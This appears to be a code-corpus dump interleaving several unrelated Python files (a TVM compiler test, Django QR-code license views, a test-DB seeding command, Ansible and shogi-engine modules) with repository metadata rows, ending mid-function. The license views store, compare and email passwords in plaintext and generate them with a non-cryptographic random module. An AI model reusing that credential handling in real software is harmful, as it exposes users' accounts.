        os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
| 35.076923
| 104
| 0.668311
| 215
| 1,824
| 5.553488
| 0.246512
| 0.100503
| 0.050251
| 0.065327
| 0.204355
| 0.058626
| 0.058626
| 0
| 0
| 0
| 0
| 0.008844
| 0.194079
| 1,824
| 52
| 105
| 35.076923
| 0.803401
| 0.010417
| 0
| 0.04878
| 0
| 0
| 0.077008
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 1
| 0.097561
| false
| 0.073171
| 0.146341
| 0
| 0.268293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b04db30f6d56200725a9e9d3be9cbc67d645d65
| 2,074
|
py
|
Python
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1
|
2020-07-29T00:21:19.000Z
|
2020-07-29T00:21:19.000Z
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1
|
2021-07-22T17:33:16.000Z
|
2021-07-22T17:33:16.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
def test_double_buffer():
    """Check the InjectDoubleBuffer pass on a simple staged-copy kernel.

    Builds an IR loop that stages A into a shared buffer B marked with
    ``double_buffer_scope`` and then reads it back into C, runs the
    double-buffer and simplify passes, and verifies:
      * the shared allocation's extent is doubled (two buffers), and
      * ThreadSync inserts the expected number of tvm_storage_sync calls.
    """
    dtype = 'int64'  # unused here; kept from the original test scaffold
    n = 100
    m = 4
    tx = te.thread_axis("threadIdx.x")
    ib = tvm.tir.ir_builder.create()
    A = ib.pointer("float32", name="A")
    C = ib.pointer("float32", name="C")
    ib.scope_attr(tx, "thread_extent", 1)
    with ib.for_range(0, n) as i:
        B = ib.allocate("float32", m, name="B", scope="shared")
        with ib.new_scope():
            # Mark B as a candidate for the double-buffering transformation.
            ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
            with ib.for_range(0, m) as j:
                B[j] = A[i * 4 + j]
        with ib.for_range(0, m) as j:
            C[j] = B[j] + 1
    stmt = ib.get()
    stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
    stmt = tvm.tir.ir_pass.Simplify(stmt)
    # After the pass, the shared allocation must cover both buffers.
    assert isinstance(stmt.body.body, tvm.tir.Allocate)
    assert stmt.body.body.extents[0].value == 2
    mod = tvm.IRModule({
        "db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
    })
    f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
    count = [0]
    def count_sync(op):
        # Counts the tvm_storage_sync intrinsic calls inserted by ThreadSync.
        if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
            count[0] += 1
    tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
    assert count[0] == 4
if __name__ == "__main__":
    test_double_buffer()
| 36.385965
| 74
| 0.655738
| 318
| 2,074
| 4.18239
| 0.430818
| 0.03609
| 0.02406
| 0.031579
| 0.065414
| 0.041353
| 0.028571
| 0.028571
| 0
| 0
| 0
| 0.019171
| 0.220347
| 2,074
| 56
| 75
| 37.035714
| 0.80334
| 0.362584
| 0
| 0.055556
| 0
| 0
| 0.085824
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.055556
| false
| 0.083333
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b2889ee02cbc2db0ebf9270a48b091ad3ca3b59
| 8,237
|
py
|
Python
|
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.files.storage import FileSystemStorage,default_storage
from django.core.mail import send_mail, EmailMessage
from core.models import Document
from core.forms import DocumentForm
from django.contrib import messages
import os
import pyqrcode
import png
import random
import base64
import cv2
import numpy as np
import pyzbar.pyzbar as pyzbar
def home(request):
    """Render the landing page listing every uploaded Document."""
    context = {'documents': Document.objects.all()}
    return render(request, 'home.html', context)
"""def simple_upload(request):
if request.method == 'POST' and request.FILES['myfile']:
myfile = request.FILES['myfile']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
media_path = os.path.join(BASE_DIR,'media')
full_path=os.path.join(media_path,myfile.name)
qr=pyqrcode.create(uploaded_file_url)
filename_before=filename.rsplit(".")
filename1=filename_before[0]+".png"
s=qr.png(filename1,scale=6)
'''from fpdf import FPDF
pdf=FPDF()
pdf.add_page()
pdf.image(filename1,x=50,y=None,w=60,h=60,type="",link=uploaded_file_url)'''
return render(request, 'simple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')"""
def model_form_upload(request):
    """Handle the license-upload form.

    On a valid POST: saves the Document, generates a random 8-digit password
    for it, stores a base64 encoding of the stored file path in ``file_url``,
    renders that encoded value into a QR code PNG, and emails the password
    (with the QR image attached) to the submitted address.
    """
    id=""
    msg=""
    if request.method == 'POST':
        form = DocumentForm(request.POST, request.FILES,request.POST)
        if form.is_valid():
            form.save()
            email=form.cleaned_data['Email']
            # Fetch the stored file path of the row just saved (last row).
            document_count=Document.objects.values_list('document').count()
            document_last=Document.objects.values_list('document')[document_count-1]
            document_name=document_last[0]
            print(email)
            t=Document.objects.last()
            # 8-digit numeric password.  NOTE(review): random is not a CSPRNG;
            # consider the secrets module for security-sensitive tokens.
            num_list=['0','1','2','3','4','5','6','7','8','9']
            password1=""
            for i in range(0,8):
                password1=password1+random.choice(num_list)
            t.password=password1
            print(type(document_name))
            # base64-encode the stored path; [2:-1] strips the "b'...'"
            # wrapper produced by str() of a bytes object.
            document_name1=document_name.encode('ascii')
            document_encode=str(base64.b64encode(document_name1))
            ax=document_encode[2:-1]
            t.file_url=ax
            print(ax)
            t.save()
            # QR payload is the encoded path; PNG is named after the file
            # (assumes the stored path contains exactly one '/' — TODO confirm).
            qr=pyqrcode.create(ax)
            filename=document_name.rsplit(".")
            filename1=filename[0].split("/")
            filename2=filename1[1]+".png"
            qr.png(filename2,scale=6)
            """mail=EmailMessage('QR',password1,'vmneelamegam2000@gmail.com',[email])
            #mail.attach(filename2,filename2.content_type)
            mail.send()"""
            # Mail the generated password with the QR image attached.
            subject = 'QRcode scanner for license'
            message = password1
            email_from = settings.EMAIL_HOST_USER
            recipient_list = [email, ]
            mail=EmailMessage( subject, message, email_from, recipient_list )
            BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
            mail.attach_file(os.path.join(BASE_DIR,filename2))
            mail.send()
            msg="your successfully uploaded"
            return redirect('model_form_upload')
    else:
        form = DocumentForm()
    return render(request, 'model_form_upload.html', {'form': form,'msg':msg})
def mypass(request):
    """Change a user's password when the two new-password fields match.

    Verifies the old credentials via a filtered ``update()``, re-queries to
    confirm the change took effect, and on success emails the new password
    to the user.  Re-renders the page with a status message in all cases.

    Cleanup vs. original: removed the unused ``c`` flag, the unused
    ``user_data`` binding, a dead triple-quoted string, and the redundant
    ``else: m = ""`` branch (``m`` already starts empty).
    """
    m = ""
    if request.POST.get("pswd") == request.POST.get("pswd3"):
        # filter().update() applies the change only where email+old password match.
        Document.objects.filter(Email=request.POST.get("email"),
                                password=request.POST.get("old_pswd")).update(
                                    password=request.POST.get("pswd"))
        # Re-query to confirm the credentials now match the new password.
        changed = Document.objects.filter(Email=request.POST.get("email"),
                                          password=request.POST.get("pswd"))
        if changed:
            subject = 'QRcode scanner for license'
            message = "Password has succesfully changed" + " " + request.POST.get("pswd")
            email_from = settings.EMAIL_HOST_USER
            recipient_list = [request.POST.get("email"), ]
            mail = EmailMessage(subject, message, email_from, recipient_list)
            mail.send()
            m = "your password is changed succesfully"
    elif len(Document.objects.filter(Email=request.POST.get("email"),
                                     password=request.POST.get("old_pswd"))) == 0 \
            and request.method == "POST":
        m = "your email or password is incorrect"
    print(m)
    return render(request, 'mypass.html', {"m": m})
def user_req(request):
    """User-side QR workflow.

    "scanner" submit: opens the webcam and blocks until pyzbar decodes a QR
    symbol, then re-renders with the decoded id.  "proceed" submit: looks up
    the Document whose file_url/password match the submitted values.
    """
    if("scanner" in request.POST and request.method=="POST"):
        # Open the default camera; CAP_DSHOW is a Windows-specific backend.
        cap = cv2.VideoCapture(0+cv2.CAP_DSHOW)
        font = cv2.FONT_HERSHEY_PLAIN
        decodedObjects=[]
        # Poll frames until at least one symbol decodes (blocks the request).
        while decodedObjects==[]:
            _, frame = cap.read()
            decodedObjects = pyzbar.decode(frame)
            for obj in decodedObjects:
                points = obj.polygon
                (x,y,w,h) = obj.rect
                pts = np.array(points, np.int32)
                pts = pts.reshape((-1, 1, 2))
                # Outline and annotate the detected symbol in the preview.
                cv2.polylines(frame, [pts], True, (0, 255, 0), 3)
                cv2.putText(frame, str(obj.data), (50, 50), font, 2,
                            (255, 0, 0), 3)
                # Last decoded symbol wins if several are in frame.
                id =obj.data.decode("utf-8")
            cv2.imshow("QR Reader", frame)
            key = cv2.waitKey(10) & 0xFF
        if decodedObjects!=[] :
            cv2.destroyAllWindows()
            return render(request,"user_req.html",{"id":id})
    if('proceed' in request.POST and request.method=="POST"):
        # file_url holds the base64-encoded path embedded in the QR code.
        userdata=Document.objects.filter(file_url=request.POST.get("id1")).filter(password=request.POST.get("password1"))
        return render(request,"user_req.html",{"userdata":userdata})
    return render(request,"user_req.html",)
def user(request):
    """Render the static user landing page."""
    template_name = "user.html"
    return render(request, template_name)
def forget_pass(request):
    """Reset a forgotten password.

    Generates a new 8-digit numeric password, stores it on every Document
    matching the submitted email, and mails it to that address.  The status
    message reflects whether any row was actually updated.

    Fix vs. original: the password is security-sensitive, so it is now drawn
    from the CSPRNG-backed ``secrets`` module instead of ``random``.
    """
    msg = ""
    if request.method == "POST":
        # secrets (not random): cryptographically strong choice for a credential.
        import secrets
        password1 = "".join(secrets.choice("0123456789") for _ in range(8))
        # update() returns the number of rows changed (0 => unknown email).
        user_data = Document.objects.filter(
            Email=request.POST.get("email")).update(password=password1)
        subject = 'QRcode scanner for license Forget password'
        message = "Password has succesfully changed" + " " + password1
        email_from = settings.EMAIL_HOST_USER
        recipient_list = [request.POST.get("email"), ]
        # NOTE: as in the original, the mail is sent even when no row matched.
        mail = EmailMessage(subject, message, email_from, recipient_list)
        mail.send()
        if user_data > 0:
            msg = "your password is changed succesfully and mail sent"
        elif user_data == 0:
            msg = "your email is incorrect or not found"
    return render(request, "forget_pass.html", {"msg": msg})
def qrcode_miss(request):
    """Re-send a lost QR code image to a user who can authenticate.

    If the submitted email/password match a Document, the stored file path is
    used to locate the QR PNG (named after the uploaded file) and the image is
    mailed back; otherwise an error message is shown.
    """
    msg=""
    if(request.method=='POST' and Document.objects.filter(Email=request.POST.get('email'),password=request.POST.get('password1'))):
        # Same credential query repeated to fetch the stored file path.
        user_data=Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1'))
        m=user_data[0][0]
        # The QR PNG was written as "<basename>.png" at the project root;
        # assumes the stored path has exactly one '/' — TODO confirm.
        p=m.split('/')
        print(p)
        t=p[1]
        print(t)
        subject = 'QRcode scanner for license'
        message = "resend"
        email_from = settings.EMAIL_HOST_USER
        recipient_list = [request.POST.get('email'),]
        mail=EmailMessage( subject, message, email_from, recipient_list )
        BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        k=os.path.join(BASE_DIR,t)
        print(k)
        mail.attach_file(k)
        mail.send()
        msg="your qrcode is sent to your email"
    elif(request.method=='POST'and Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1')).count()==0):
        msg="your email or password is incorrect"
    return render(request,'qrcode_miss.html',{"msg":msg})
| 42.901042
| 167
| 0.617701
| 1,016
| 8,237
| 4.889764
| 0.20374
| 0.059783
| 0.064815
| 0.038245
| 0.466787
| 0.367552
| 0.298712
| 0.285427
| 0.285427
| 0.253019
| 0
| 0.020186
| 0.2422
| 8,237
| 191
| 168
| 43.125654
| 0.775713
| 0
| 0
| 0.223684
| 0
| 0
| 0.124964
| 0.003171
| 0.013158
| 0
| 0.000577
| 0
| 0
| 1
| 0.046053
| false
| 0.164474
| 0.098684
| 0.006579
| 0.210526
| 0.046053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b2cec5a2588f39302333a5f4dacaf75c507b16b
| 3,344
|
py
|
Python
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | 2
|
2021-06-01T08:33:04.000Z
|
2021-08-20T04:22:39.000Z
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
"""
Setup DB with example data for tests
"""
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User, Group
from django.core.management.base import BaseCommand
from api import models
class Command(BaseCommand):
    """Management command that seeds the DB with example users, inventories,
    job templates and tasks for the test suite."""

    help = 'Setup DB with example data for tests'

    def handle(self, *args, **options):
        print('---- Creating Users ----')
        # (username, raw password, group to join); creation order fixes the ids.
        user_specs = (
            ('thomastest', 'imatestin', 'superuser'),
            ('norbert', 'netzwerk', 'netadmin'),
            ('stefan', 'helldesk', 'support'),
        )
        for username, raw_password, group_name in user_specs:
            User.objects.get_or_create(
                username=username, password=make_password(raw_password))
            account = User.objects.get(username=username)
            # Groups are expected to exist already; just attach the member.
            Group.objects.get(name=group_name).user_set.add(account)
        print('---- Creating Inventory ----')
        models.Inventory.objects.create(
            name='Example',
            hosts_file='web_nornir/nornir_config/example_config/hosts.yaml',
            groups_file='web_nornir/nornir_config/example_config/groups.yaml',
            type=1)
        models.Inventory.objects.create(
            name='INS Lab',
            hosts_file='web_nornir/nornir_config/inslab_config/hosts.yaml',
            groups_file='web_nornir/nornir_config/inslab_config/groups.yaml',
            type=1)
        print('---- Creating Job Templates ----')
        template_specs = (
            dict(name='hello_world', description='This prints a hello world',
                 file_name='hello_world.py', created_by_id=1),
            dict(name='Get CDP Neighbors', description='Lists all CDP neighbors',
                 file_name='get_cdp_neighbors.py', created_by_id=1),
            dict(name='Get Interfaces',
                 description='Gets brief information about all interfaces, sh ip int br',
                 file_name='get_interfaces.py', created_by_id=1),
            dict(name='Ping Device',
                 description='Pings a chosen network device and reports if reachable',
                 file_name='ping.py', variables=['target'], created_by_id=1),
            dict(name='Get Configuration',
                 description='Gets all configuration from device',
                 file_name='get_configuration.py', created_by_id=1),
        )
        for spec in template_specs:
            models.JobTemplate.objects.create(**spec)
        print('---- Creating Tasks ----')
        models.Task.objects.create(
            name='Get Hello World', created_by_id=1, template_id=1, inventory_id=1)
        models.Task.objects.create(
            name='Get CDP neighbors of INS lab', created_by_id=2, template_id=2,
            inventory_id=2)
        models.Task.objects.create(
            name='Get interfaces of INS lab', created_by_id=2, template_id=3,
            inventory_id=2)
        print('---- ALL DONE!! ----')
| 54.819672
| 121
| 0.62201
| 387
| 3,344
| 5.21447
| 0.284238
| 0.06442
| 0.084242
| 0.035679
| 0.433598
| 0.35332
| 0.247275
| 0.173935
| 0.173935
| 0.098612
| 0
| 0.006486
| 0.262261
| 3,344
| 60
| 122
| 55.733333
| 0.811512
| 0.010766
| 0
| 0
| 0
| 0
| 0.283333
| 0.061728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0.093023
| 0.093023
| 0
| 0.162791
| 0.139535
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b4af341d1bd006f2df5874fa788b8866cb5c77d
| 800
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
#
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The arg spec for the junos facts module.
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
class FactsArgs(object):
    """Argument spec for the junos facts module."""

    def __init__(self, **kwargs):
        # Stateless holder; the spec lives on the class.
        pass

    # Options accepted by the facts module and their validation rules.
    argument_spec = {
        "gather_subset": {
            "default": ["!config"], "type": "list", "elements": "str",
        },
        "config_format": {
            "default": "text", "choices": ["xml", "text", "set", "json"],
        },
        "gather_network_resources": {"type": "list", "elements": "str"},
        "available_network_resources": {"type": "bool", "default": False},
    }
| 25.806452
| 74
| 0.60625
| 95
| 800
| 4.884211
| 0.705263
| 0.025862
| 0.043103
| 0.056034
| 0.137931
| 0.137931
| 0.137931
| 0.137931
| 0
| 0
| 0
| 0.014706
| 0.235
| 800
| 30
| 75
| 26.666667
| 0.743464
| 0.2775
| 0
| 0.133333
| 0
| 0
| 0.233929
| 0.091071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0.066667
| 0.066667
| 0
| 0.266667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86346fa63b7971b7ad956846f8bc8dcc94175283
| 2,679
|
py
|
Python
|
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | null | null | null |
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | 3
|
2020-02-11T23:38:20.000Z
|
2021-06-10T19:10:53.000Z
|
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | 1
|
2018-09-19T11:19:48.000Z
|
2018-09-19T11:19:48.000Z
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth import update_session_auth_hash, login, authenticate
from django.contrib import messages
from django.shortcuts import render, redirect
from social_django.models import UserSocialAuth
from django.http import HttpResponse
from django.shortcuts import get_object_or_404, redirect
from rest_framework.authtoken.models import Token
from app.methods import prepare_user
def get_token(request):
    """Issue (or reuse) a DRF auth token for the logged-in user and redirect
    to the mobile app via the travel:// URL scheme.

    Anonymous requests are redirected to travel://error.

    Fix vs. original: ``if request.user:`` is effectively always true in
    Django (AnonymousUser is truthy), so the error branch was unreachable;
    test ``is_authenticated`` instead.
    """
    if request.user.is_authenticated:
        user = request.user
        prepare_user(user)
        token, _ = Token.objects.get_or_create(user=user)
        url = "travel://?token=" + token.key + '&id=' + str(user.id)
    else:
        url = "travel://error"
    # Manual 302 so the custom scheme survives; Location drives the redirect.
    response = HttpResponse(url, status=302)
    response['Location'] = url
    return response
@login_required
def get_facebook_token(request):
    """Show the raw extra_data of the caller's linked Facebook account."""
    social_account = get_object_or_404(
        UserSocialAuth, user=request.user, provider='facebook')
    return HttpResponse(str(social_account.extra_data))
def signup(request):
    """Render the signup page."""
    template_name = 'signup.html'
    return render(request, template_name)
@login_required
def home(request):
    """Render the authenticated home page."""
    template_name = 'home.html'
    return render(request, template_name)
@login_required
def settings(request):
    """Render the account settings page.

    Shows the user's Facebook link status and whether it may be disconnected
    (only when another login method — a usable password or a second social
    auth — would remain, so the user cannot lock themselves out).

    Cleanup vs. original: removed the github/twitter lookups whose results
    were never passed to the template (dead code and two wasted DB queries).
    """
    user = request.user
    try:
        facebook_login = user.social_auth.get(provider='facebook')
    except UserSocialAuth.DoesNotExist:
        facebook_login = None
    can_disconnect = (user.social_auth.count() > 1 or user.has_usable_password())
    return render(request, 'settings.html', {
        'facebook_login': facebook_login,
        'can_disconnect': can_disconnect
    })
@login_required
def password(request):
    """Let the user change (or set) their password.

    Users without a usable password (social-auth-only accounts) get the
    admin form, which does not ask for the current password.
    """
    if request.user.has_usable_password():
        form_class = PasswordChangeForm
    else:
        form_class = AdminPasswordChangeForm
    if request.method != 'POST':
        return render(request, 'password.html', {'form': form_class(request.user)})
    form = form_class(request.user, request.POST)
    if form.is_valid():
        form.save()
        # Keep the current session valid after the credential change.
        update_session_auth_hash(request, form.user)
        messages.success(request, 'Your password was successfully updated!')
        return redirect('password')
    messages.error(request, 'Please correct the error below.')
    return render(request, 'password.html', {'form': form})
| 31.892857
| 99
| 0.709966
| 312
| 2,679
| 5.942308
| 0.294872
| 0.04315
| 0.036677
| 0.040453
| 0.081985
| 0.048544
| 0
| 0
| 0
| 0
| 0
| 0.00464
| 0.195595
| 2,679
| 83
| 100
| 32.277108
| 0.855684
| 0
| 0
| 0.231884
| 0
| 0
| 0.086226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0.15942
| 0.15942
| 0.028986
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
865b48e5b6d60c2c5b81fb4b0a827e80f5502ece
| 4,482
|
py
|
Python
|
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | null | null | null |
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | 2
|
2021-06-28T11:09:19.000Z
|
2021-06-30T16:59:13.000Z
|
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | 9
|
2021-06-28T08:06:08.000Z
|
2021-10-06T05:01:57.000Z
|
import os
import shogi
import backoff
import subprocess
from util import *
import logging
logger = logging.getLogger(__name__)
import engine_ctrl
@backoff.on_exception(backoff.expo, BaseException, max_time=120)
def create_engine(config, board):
    """Build a USIEngine from the 'engine' section of *config*.

    Retries with exponential backoff (up to 120s) on any exception.
    """
    cfg = config["engine"]
    engine_path = os.path.realpath(os.path.join(cfg["dir"], cfg["name"]))
    engine_type = cfg.get("protocol")  # read but not used beyond this point
    engine_options = cfg.get("engine_options")
    commands = [engine_path]
    if engine_options:
        commands.extend(
            "--{}={}".format(key, value) for key, value in engine_options.items())
    silence_stderr = cfg.get("silence_stderr", False)
    return USIEngine(board, commands, cfg.get("usi_options", {}),
                     cfg.get("go_commands", {}), silence_stderr)
class EngineWrapper:
    """Base interface for engine backends.

    Concrete wrappers (e.g. USIEngine) override the search/stat hooks; the
    defaults here are no-ops that return None.
    """

    def __init__(self, board, commands, options=None, silence_stderr=False):
        """No-op: subclasses own process startup."""

    def search_for(self, board, movetime):
        """Hook: search a position for a fixed movetime."""

    def first_search(self, board, movetime):
        """Hook: first search of the game."""

    def search(self, game, board, btime, wtime, binc, winc):
        """Hook: clock-based search."""

    def print_stats(self):
        """Hook: log engine search statistics."""

    def get_opponent_info(self, game):
        """Hook: pass opponent details to the engine."""

    def name(self):
        """Return the engine's self-reported name."""
        return self.engine.name

    def report_game_result(self, game, board):
        """Hook: inform the engine of the final result."""

    def quit(self):
        """Terminate the underlying engine process."""
        self.engine.kill_process()

    def print_handler_stats(self):
        """Hook: log protocol-handler statistics."""

    def get_handler_stats(self):
        """Hook: return protocol-handler statistics."""
class USIEngine(EngineWrapper):
    """EngineWrapper backed by an external USI engine process (engine_ctrl)."""
    def __init__(self, board, commands, options, go_commands={}, silence_stderr=False):
        # NOTE(review): go_commands={} is a mutable default; safe only while
        # callers never mutate it (create_engine passes a fresh dict).
        commands = commands[0] if len(commands) == 1 else commands
        self.go_commands = go_commands
        self.engine = engine_ctrl.Engine(commands)
        # USI handshake, then apply configured options before readiness check.
        self.engine.usi()
        if options:
            for name, value in options.items():
                self.engine.setoption(name, value)
        self.engine.isready()
    def first_search(self, board, movetime):
        """Search the current position for a fixed movetime; returns best move."""
        best_move, _ = self.engine.go(board.sfen(), "", movetime=movetime)
        return best_move
    def search_with_ponder(self, game, board, btime, wtime, binc, winc, byo, ponder=False):
        """Search returning a (best_move, ponder_move) tuple.

        Configured go_commands (nodes/depth/movetime) take precedence over
        the clock parameters when present.
        """
        moves = [m.usi() for m in list(board.move_stack)]
        cmds = self.go_commands
        if len(cmds) > 0:
            # Fixed-limit search taken from the configuration.
            best_move, ponder_move = self.engine.go(
                game.initial_fen,
                moves,
                nodes=cmds.get("nodes"),
                depth=cmds.get("depth"),
                movetime=cmds.get("movetime"),
                ponder=ponder
            )
        else:
            # Clock-based search using the supplied time parameters.
            best_move, ponder_move = self.engine.go(
                game.initial_fen,
                moves,
                btime=btime,
                wtime=wtime,
                binc=binc,
                winc=winc,
                byo=byo,
                ponder=ponder
            )
        return (best_move, ponder_move)
    def search(self, game, board, btime, wtime, binc, winc):
        """Clock-based search that also forwards any configured fixed limits."""
        cmds = self.go_commands
        moves = [m.usi() for m in list(board.move_stack)]
        best_move, _ = self.engine.go(
            game.initial_fen,
            moves,
            btime=btime,
            wtime=wtime,
            binc=binc,
            winc=winc,
            depth=cmds.get("depth"),
            nodes=cmds.get("nodes"),
            movetime=cmds.get("movetime")
        )
        return best_move
    def stop(self):
        # NOTE(review): kills the engine process instead of sending USI "stop".
        self.engine.kill_process()
    def print_stats(self, stats=None):
        """Log selected fields of the engine's last "info" output."""
        if stats is None:
            stats = ['score', 'depth', 'nodes', 'nps']
        info = self.engine.info
        for stat in stats:
            if stat in info:
                logger.info("{}: {}".format(stat, info[stat]))
    def get_stats(self, stats=None):
        """Return selected "info" fields as "name: value" strings."""
        if stats is None:
            stats = ['score', 'depth', 'nodes', 'nps']
        info = self.engine.info
        stats_str = []
        for stat in stats:
            if stat in info:
                stats_str.append("{}: {}".format(stat, info[stat]))
        return stats_str
    def get_opponent_info(self, game):
        # NOTE(review): these values are computed but never used or returned —
        # looks like leftover code; confirm intent before relying on it.
        name = game.opponent.name
        if name:
            rating = game.opponent.rating if game.opponent.rating is not None else "none"
